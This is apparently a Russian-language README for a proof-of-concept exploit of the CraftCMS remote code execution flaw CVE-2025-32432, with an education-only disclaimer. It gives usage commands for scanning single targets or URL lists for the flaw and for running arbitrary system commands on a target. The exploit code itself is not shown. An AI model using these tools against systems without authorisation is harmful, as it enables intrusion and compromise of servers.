
CraftCMS CVE-2025-32432 - Чистый PoC
Очищенная и улучшенная версия оригинального Proof of Concept.
Этот проект распространяется под лицензией MIT.
См. файл LICENSE для получения подробной информации.
Этот PoC предоставляется исключительно в образовательных целях и для разрешённых тестов (CTF, аудиты безопасности с письменного разрешения).
Любое использование в системах без авторизации является незаконным. Автор не несёт ответственности за неправомерное использование.
craftcms-cve-2025-32432-poc/
├── craftcms_rce_php_check.py
├── craftcms_final_payload.py
├── requirements.txt
├── README.md
├── LICENSE
└── .gitignore
git clone https://github.com/n40y/craftcms-cve-2025-32432-poc.git
cd craftcms-cve-2025-32432-poc
pip3 install -r requirements.txt
python3 craftcms_rce_php_check.py -u https://target.com
# Или со списком
python3 craftcms_rce_php_check.py -f urls.txt -t 10
python3 craftcms_final_payload.py -u https://victim.com -c "id"
-u, --url → Целевой URL (обязательно)
-c, --cmd → Системная команда для выполнения (обязательно)
-a, --asset → Известный действительный AssetId (опционально)
-s, --scan-max → Максимальный сканируемый assetId (по умолчанию: 300)